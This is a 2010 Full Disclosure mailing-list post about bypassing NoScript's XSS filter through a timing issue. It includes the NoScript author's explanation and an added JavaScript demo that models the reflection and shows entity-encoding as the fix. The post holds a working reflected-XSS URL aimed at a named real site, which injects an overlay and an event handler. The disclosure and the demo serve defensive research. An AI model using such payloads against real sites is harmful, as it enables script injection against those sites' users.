Full Disclosure mailing list archives

Fwd: NoScript (2.0.5.1 < less ) - Bypass "Reflective XSS" through Union SQL Poisoning Trick (SQLXSSI)


From: dave b <db.pub.mail () gmail com>
Date: Wed, 1 Dec 2010 02:41:12 +1100

Bugtraq rejected my email so I am sending it to full disclosure instead...


---------- Forwarded message ----------
From: dave b <db.pub.mail () gmail com>
Date: 29 November 2010 22:54
Subject: NoScript (2.0.5.1 < less ) - Bypass "Reflective XSS" through
Union SQL Poisoning Trick (SQLXSSI)
To: bugtraq () securityfocus com


Ok...

How about this:

This works against the latest NoScript.
----------
ME:

It is exactly this --->


http://www.virginblue.com.au/Search/index.htm?search=\""; style=position%3Aabsolute;top:0;left:0;z-index:1000;width:3000px;height%3A3000px onMouseMove=alert(1) bgcolor=black"

I just reproduced it on a vanilla Firefox with the latest NoScript installed.
(NoScript blocking the domain -> enable, moving the mouse while
reloading -> XSSed, and it warns me about blocking a potential XSS)

This is not an unrealistic thing to do (well, the ordering of events
is probably going to be a bit unrealistic, or could be), because some
sites need JavaScript to be enabled.


----------
Giorgio:
OK, now I can see what you mean.
This is due to the page taking too long to reload after the domain has
been enabled: since NoScript checks for XSS only when the target page
is JavaScript-enabled, the page you're moving the mouse upon is not
sanitized yet (it will be after it reloads), so the code is triggered.

This is not technically a bypass of the filter (the filter is working
correctly), but I recognize this, albeit an edge case, deserves to be
addressed.
I'm gonna disable event processing for just-enabled pages as long as
they don't get fully reloaded.

Thanks and best,
-- G

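The exchange above turns on two things: the reflected "search" parameter breaking out of a quoted attribute, and NoScript's filter not yet having run on the page the mouse is over. The following is an added example, not code from the original post, from NoScript, or from the site named in the URL. It models only the first part, with a hypothetical search page that echoes the "search" query parameter into the value="" attribute of an <input>, and shows which attributes a browser-style tokenizer sees in the raw reflection versus an entity-encoded one. Everything in it (the page template, the helper names, the tokenizer) is an assumption made for illustration; the query string is the one from the posted URL with the line wrapping removed. Runs under Node with no dependencies.

```javascript
// Added example: not code from the original post, NoScript, or the site in
// the URL. Models a hypothetical search page that reflects the "search"
// parameter into value="" and shows why the posted payload smuggles in an
// onMouseMove handler plus a full-page overlay. Node.js, no dependencies.

// The query string from the posted URL (line-wrapping removed), URL-decoded
// the way a server would before reflecting it.
const QUERY = '\\""; style=position%3Aabsolute;top:0;left:0;z-index:1000;' +
  'width:3000px;height%3A3000px onMouseMove=alert(1) bgcolor=black"';
const PAYLOAD = decodeURIComponent(QUERY);

// Vulnerable reflection (assumed template): raw interpolation into a
// double-quoted attribute. The \" at the start of the payload closes
// value="..." and the rest is parsed as further attributes of the <input>.
function renderVulnerable(search) {
  return `<input type="text" name="search" value="${search}">`;
}

// Hardened reflection: entity-encode the five characters that can change
// HTML attribute or text context. With " encoded as &quot; the payload can
// no longer leave the attribute it was reflected into.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(search) {
  return `<input type="text" name="search" value="${escapeAttr(search)}">`;
}

// Minimal approximation of the HTML5 start-tag tokenizer, enough to show
// where a browser places attribute boundaries. Returns [{name, value}] with
// names lower-cased. Quoted values end at the matching quote; unquoted
// values end at whitespace or '>'.
function parseAttributes(tagHtml) {
  const attrs = [];
  let i = tagHtml.indexOf('<') + 1;
  while (i < tagHtml.length && !/[\s\/>]/.test(tagHtml[i])) i++; // skip tag name
  while (i < tagHtml.length) {
    while (i < tagHtml.length && /[\s\/]/.test(tagHtml[i])) i++;
    if (i >= tagHtml.length || tagHtml[i] === '>') break;
    let name = '';
    while (i < tagHtml.length && !/[\s\/>=]/.test(tagHtml[i])) name += tagHtml[i++];
    while (i < tagHtml.length && /\s/.test(tagHtml[i])) i++;
    let value = '';
    if (tagHtml[i] === '=') {
      i++;
      while (i < tagHtml.length && /\s/.test(tagHtml[i])) i++;
      const q = tagHtml[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < tagHtml.length && tagHtml[i] !== q) value += tagHtml[i++];
        i++; // consume the closing quote
      } else {
        while (i < tagHtml.length && !/[\s>]/.test(tagHtml[i])) value += tagHtml[i++];
      }
    }
    attrs.push({ name: name.toLowerCase(), value });
  }
  return attrs;
}

// True if any attribute is an inline event handler (on*). In the vulnerable
// rendering this is the onmousemove= the payload injected; the injected
// style= overlays the whole viewport so the first mouse movement hits it.
function hasEventHandler(attrs) {
  return attrs.some((a) => a.name.startsWith('on'));
}

// Demo: list the attributes each rendering yields.
for (const [label, html] of [
  ['vulnerable', renderVulnerable(PAYLOAD)],
  ['hardened', renderHardened(PAYLOAD)],
]) {
  const attrs = parseAttributes(html);
  console.log(`${label}: ${attrs.map((a) => a.name).join(', ')} ` +
    `(event handler present: ${hasEventHandler(attrs)})`);
}
```

Run it with node. The vulnerable rendering yields style, onmousemove and bgcolor as separate attributes of the <input>; the hardened one yields only type, name and value, with the whole payload sitting inertly inside value. The timing problem Giorgio describes is a separate issue and is not modelled here: once the handler is in the DOM, whether it fires depends only on JavaScript being enabled for the page before it is reloaded.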
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
